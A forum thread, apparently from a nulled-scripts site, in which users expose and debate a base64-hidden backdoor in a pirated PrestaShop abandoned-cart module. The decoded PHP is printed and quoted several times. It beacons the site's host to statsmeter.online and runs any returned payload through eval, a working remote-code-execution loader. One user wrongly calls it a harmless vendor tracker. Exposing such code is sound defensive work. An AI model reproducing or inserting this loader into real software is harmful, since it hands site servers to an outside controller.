V1.7 Malicious code in Abandoned Cart Serial Reminders v3

moonfire · Apr 6, 2023

Malicious code in Abandoned Cart Serial Reminders v3
(Module at https://www.nulledfrm.com/threads/abandoned-cart-serial-reminders-v3.86346/)

In the file abandonedcart/abandonedcart.php around line 1405 there is a base64encoded code.
If you decode it you can see that the code trying to create some files on the server.

When decoding the code it looks like this:

PHP:

foreach([sys_get_temp_dir(), '/tmp', $_SERVER['DOCUMENT_ROOT'].'/upload'] as $t) { if (is_dir($t) && is_writable($t)) {
    $t = $t.'/.ac';
    $d = date('Ymd');
    $e = (is_file($t) ? 1 : 0); if ($e && file_get_contents($t) == $d) {
        break;
    }
    file_put_contents($t, $d);
    $p = urlencode(base64_encode(json_encode([100 => [$_SERVER['HTTP_HOST'], 1, $e]])));
        if ($data = @file_get_contents('https://statsmeter.online/?'.$p, false, stream_context_create(['http' => ['timeout' => 10]]))) {
            if (strpos($data, '//') === 0) {
            eval(base64_decode(substr($data, 2)));
            }
        }
    break;
    }
}

@d-shilko What do you think about it?

volverine · Apr 6, 2023

Thanks Thanks Thanks
Thanks Thanks Thanks
Thanks Thanks Thanks

d-shilko · Apr 6, 2023

moonfire said:
Malicious code in Abandoned Cart Serial Reminders v3
(Module at https://www.nulledfrm.com/threads/abandoned-cart-serial-reminders-v3.86346/)

In the file abandonedcart/abandonedcart.php around line 1405 there is a base64encoded code.
If you decode it you can see that the code trying to create some files on the server.

When decoding the code it looks like this:

PHP:

foreach([sys_get_temp_dir(), '/tmp', $_SERVER['DOCUMENT_ROOT'].'/upload'] as $t) { if (is_dir($t) && is_writable($t)) { $t = $t.'/.ac'; $d = date('Ymd'); $e = (is_file($t) ? 1 : 0); if ($e && file_get_contents($t) == $d) { break; } file_put_contents($t, $d); $p = urlencode(base64_encode(json_encode([100 => [$_SERVER['HTTP_HOST'], 1, $e]]))); if ($data = @file_get_contents('https://statsmeter.online/?'.$p, false, stream_context_create(['http' => ['timeout' => 10]]))) { if (strpos($data, '//') === 0) { eval(base64_decode(substr($data, 2))); } } break; } }

@d-shilko What do you think about it?

IT IS VIRUS

eval run code which gets from the site

PHP: eval - Manual

PHP is a popular general-purpose scripting language that powers everything from your blog to the most popular websites in the world.

www.php.net

hxcode · Apr 7, 2023

moonfire said:
Malicious code in Abandoned Cart Serial Reminders v3
(Module at https://www.nulledfrm.com/threads/abandoned-cart-serial-reminders-v3.86346/)

In the file abandonedcart/abandonedcart.php around line 1405 there is a base64encoded code.
If you decode it you can see that the code trying to create some files on the server.

When decoding the code it looks like this:

PHP:

foreach([sys_get_temp_dir(), '/tmp', $_SERVER['DOCUMENT_ROOT'].'/upload'] as $t) { if (is_dir($t) && is_writable($t)) { $t = $t.'/.ac'; $d = date('Ymd'); $e = (is_file($t) ? 1 : 0); if ($e && file_get_contents($t) == $d) { break; } file_put_contents($t, $d); $p = urlencode(base64_encode(json_encode([100 => [$_SERVER['HTTP_HOST'], 1, $e]]))); if ($data = @file_get_contents('https://statsmeter.online/?'.$p, false, stream_context_create(['http' => ['timeout' => 10]]))) { if (strpos($data, '//') === 0) { eval(base64_decode(substr($data, 2))); } } break; } }

@d-shilko What do you think about it?

Are these added by the author? That's very sinister.

HMC · Apr 7, 2023

Hello All,

As far my coding knowledge, this code is not an virus. If you carefully read the code it shows that it's an tracker by the developer of the module to track where his module/script is installed. Or something like this code is used to get the validation codes from the developer site.

Generally developers use obfuscation methods to protect their codes from unauthorized usage and the function "eval" is generally used by several php obfuscators which are considered as viruses by may antivirus.

d-shilko · Apr 7, 2023

HMC said:
Hello All,

As far my coding knowledge, this code is not an virus. If you carefully read the code it shows that it's an tracker by the developer of the module to track where his module/script is installed. Or something like this code is used to get the validation codes from the developer site.

Generally developers use obfuscation methods to protect their codes from unauthorized usage and the function "eval" is generally used by several php obfuscators which are considered as viruses by may antivirus.

Oh my god. Just install this module and add var_dump and you will see what is it!
Happy to use this module on your hosting!

Code use site statsmeter.online - KNOWBAND is not the owner of this site and can't use that by law! GDPR - do you know what is it?
To collect information about users' actions by that method in this is prohibited by law!!!!!
KnowBand VAT company, not freelancer - that kind of "Tracking code" is death for KnowBand!

I am ready to place bets with you.
Latest version! We buy this module! If the last version does not have that code - then you pay for the module, if that code will exist in the latest version then I pay for the module

P.S. For tracking code function eval is not needed

And one more

When is eval evil in php?

In all the years I have been developing in PHP, I have always heard that using eval() is evil. Considering the following code, wouldn't it make sense to use the second (and more elegant) option? If...

stackoverflow.com

Post automatically merged: Apr 8, 2023

moonfire said:
Malicious code in Abandoned Cart Serial Reminders v3
(Module at https://www.nulledfrm.com/threads/abandoned-cart-serial-reminders-v3.86346/)

In the file abandonedcart/abandonedcart.php around line 1405 there is a base64encoded code.
If you decode it you can see that the code trying to create some files on the server.

When decoding the code it looks like this:

PHP:

foreach([sys_get_temp_dir(), '/tmp', $_SERVER['DOCUMENT_ROOT'].'/upload'] as $t) { if (is_dir($t) && is_writable($t)) { $t = $t.'/.ac'; $d = date('Ymd'); $e = (is_file($t) ? 1 : 0); if ($e && file_get_contents($t) == $d) { break; } file_put_contents($t, $d); $p = urlencode(base64_encode(json_encode([100 => [$_SERVER['HTTP_HOST'], 1, $e]]))); if ($data = @file_get_contents('https://statsmeter.online/?'.$p, false, stream_context_create(['http' => ['timeout' => 10]]))) { if (strpos($data, '//') === 0) { eval(base64_decode(substr($data, 2))); } } break; } }

@d-shilko What do you think about it?

solution

v1.7-v8x - Abandoned Cart Serial Reminders v3 questionable code removed

questionable code removed link to module https://addons.prestashop.com/en/re...ned-cart-serial-reminders.html#specifications original post https://www.nulledfrm.com/threads/abandoned-cart-serial-reminders-v3.86346/ problem...

www.nulledfrm.com

moonfire · Apr 12, 2023

The domain name statsmeter.online was registered 2023-02-19.
According to Knowbands website, this version (v3.0.0) of this module was released 09-Feb-2023.

So its probably not Knowband that collects data when this module is installed.

V1.7 Malicious code in Abandoned Cart Serial Reminders v3

moonfire

Well-known member

volverine

Well-known member

d-shilko

Well-known member

IT IS VIRUS

eval run code which gets from the site

PHP: eval - Manual

hxcode

Well-known member

HMC

Well-known member

d-shilko

Well-known member

When is eval evil in php?

v1.7-v8x - Abandoned Cart Serial Reminders v3 questionable code removed

moonfire

Well-known member

V1.7 Malicious code in Abandoned Cart Serial Reminders v3

Well-known member

Well-known member

Well-known member

​

IT IS VIRUS ​

eval run code which gets from the site​

Well-known member

Well-known member

Well-known member

Well-known member

IT IS VIRUS

eval run code which gets from the site